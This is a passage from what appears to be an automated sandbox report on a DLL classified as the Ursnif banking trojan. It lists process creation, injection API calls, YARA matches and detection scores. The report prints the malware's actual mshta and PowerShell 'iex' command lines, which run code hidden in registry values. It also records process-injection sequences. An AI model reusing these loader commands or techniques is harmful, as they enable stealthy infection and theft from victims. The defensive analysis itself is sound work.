            Source: C:\Windows\System32\control.exeCode function: 35_2_00FACCA0 NtReadVirtualMemory,
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCADD4 NtQueryInformationProcess,
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FBF560 NtSetInformationProcess,CreateRemoteThread,TerminateThread,
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FBFFCC NtMapViewOfSection,
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC676C NtSetContextThread,NtUnmapViewOfSection,NtClose,
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FE1002 NtProtectVirtualMemory,NtProtectVirtualMemory,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00442F65 CreateProcessAsUserW,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_00432161
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_00431AE4
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_737522A4
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0047181A
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045F9C9
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004491D8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044A235
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004562B9
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00447CF0
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00451481
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045C53B
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045BDD5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044DE6E
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00459F48
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00466F28
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCC164
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCA4BC
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC676C
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC20F8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCE080
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC6064
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FBB040
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA203C
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC0034
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC91A0
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB1174
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCF940
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB9138
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FAC134
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC8224
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC3208
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA2BC8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB9380
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA8B5C
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB8B4C
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA7320
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FABCF8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB3CE0
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC74CC
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB0CC0
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC94B8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB9CB0
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FBD4A8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FAD460
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB1D94
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB452C
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FBB520
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCB516
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA6D08
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC26B4
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCBEB0
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FAAE04
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA37B8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB17B8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCAFB8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA9F98
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FBF770
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FAB75C
            Source: jery0dbp.dll.31.drStatic PE information: No import functions for PE file found
            Source: 1453igkk.dll.29.drStatic PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\loaddll32.exeSection loaded: onecorecommonproxystub.dll
            Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@25/54@4/2
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00443861 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\loaddll32.exeMutant created: \Sessions\1\BaseNamedObjects\{D2ACCE85-0966-D4B7-2326-4D4807BAD1FC}
            Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{C659AAB4-6D66-E894-275A-F19C4B2EB590}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{AABE5E0C-015E-6C1F-DB7E-C5603F92C994}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_01
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF9DD6CD76C3034B75.TMPJump to behavior
            Source: onerous.tar.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: onerous.tar.dllVirustotal: Detection: 47%
            Source: onerous.tar.dllReversingLabs: Detection: 58%
            Source: loaddll32.exeString found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\onerous.tar.dll'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7128 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17422 /prefetch:2
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP'
            Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7128 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17422 /prefetch:2
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP'
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001D.00000002.386299480.000001E454AC0000.00000002.00000001.sdmp, csc.exe, 0000001F.00000002.393531014.00000252540B0000.00000002.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000021.00000000.419495415.000000000E9C0000.00000002.00000001.sdmp
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.415714713.0000000003CB0000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.415714713.0000000003CB0000.00000004.00000001.sdmp
            Source: Binary string: rundll32.pdb source: control.exe, 00000023.00000002.853520403.0000011AB5EFC000.00000004.00000040.sdmp
            Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000023.00000002.853520403.0000011AB5EFC000.00000004.00000040.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000021.00000000.419495415.000000000E9C0000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            Suspicious powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045735C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_0043AE32 push eax; iretd
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_0043AE34 push esi; iretd
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_00431AD3 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_00431A80 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_0043AF92 push edx; iretd
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_73752240 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_73752293 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0046B834 push cs; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0046BA9E push esp; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00466BB0 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00466F17 push ecx; ret
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA4DCD push 3B000001h; retf
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 4672, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY
            Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
